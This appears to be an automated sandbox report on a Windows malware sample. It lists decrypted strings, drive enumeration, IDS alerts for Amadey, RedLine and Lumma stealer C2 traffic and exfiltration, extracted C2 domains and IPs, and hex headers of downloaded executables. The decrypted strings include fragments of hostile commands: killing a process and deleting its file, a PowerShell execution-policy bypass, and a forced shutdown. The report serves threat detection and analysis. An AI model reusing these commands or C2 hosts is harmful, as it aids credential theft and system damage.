Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Bitdefender
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Norton
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Sophos
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Comodo
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: WinDefender
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 0123456789
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ------
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ?scr=1
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ComputerName
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -unicode-
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: VideoID
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: ProductName
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: CurrentBuild
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rundll32.exe
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: "taskkill /f /im "
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && timeout 1 && del
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: && Exit"
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: " && ren
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Powershell.exe
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: shutdown -s -t 0
Source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp	String decryptor: random

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49932 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49982 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.6:49986 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.6:49986 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.6:49995 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49947
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.6:50000 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.6:49986
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.6:49986 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.6:50754 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50059 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50058 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50057 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50064 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50061 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 103.84.89.222:33791 -> 192.168.2.6:49986
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50062 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50066 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50070 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.6:50068 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50055
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 185.215.113.97:80 -> 192.168.2.6:50077
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50078 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50076
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50058 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50061 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50058 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50070 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50059 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50059 -> 172.67.150.254:443

Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:46:09 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Sun, 09 Feb 2025 15:24:58 GMTConnection: keep-aliveETag: "67a8c8ca-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:48:47 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:48:47 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:49:18 GMTContent-Type: application/octet-streamContent-Length: 5347592Last-Modified: Sun, 09 Feb 2025 19:16:12 GMTConnection: keep-aliveETag: "67a8fefc-519908"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 5f 0e e5 45 3e 60 b6 45 3e 60 b6 45 3e 60 b6 f1 a2 91 b6 4f 3e 60 b6 f1 a2 93 b6 3f 3e 60 b6 f1 a2 92 b6 5d 3e 60 b6 c5 45 65 b7 60 3e 60 b6 c5 45 64 b7 54 3e 60 b6 c5 45 63 b7 51 3e 60 b6 4c 46 f3 b6 41 3e 60 b6 5b 6c f3 b6 46 3e 60 b6 45 3e 61 b6 25 3e 60 b6 cb 45 69 b7 44 3e 60 b6 cb 45 9f b6 44 3e 60 b6 cb 45 62 b7 44 3e 60 b6 52 69 63 68 45 3e 60 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ac e6 77 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 b2 00 00 00 ca 4e 00 00 00 00 00 ad 14 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 4f 00 00 04 00 00 9a cd 4f 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 29 01 00 50 00 00 00 00 60 01 00 64 4e 4e 00 00 00 00 00 00 00 00 00 00 80 4f 00 08 19 02 00 00 b0 4f 00 a8 0e 00 00 20 1f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af b1 00 00 00 10 00 00 00 b2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 60 00 00 00 d0 00 00 00 62 00 00 00 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 11 00 00 00 40 01 00 00 08 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 64 4e 4e 00 00 60 01 00 00 50 4e 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 0e 00 00 00 b0 4f 00 00 10 00 00 00 70 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.97 185.215.113.97

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49953 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50056 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50058 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50059 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50064 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50061 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50062 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50066 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50070 -> 172.67.150.254:443
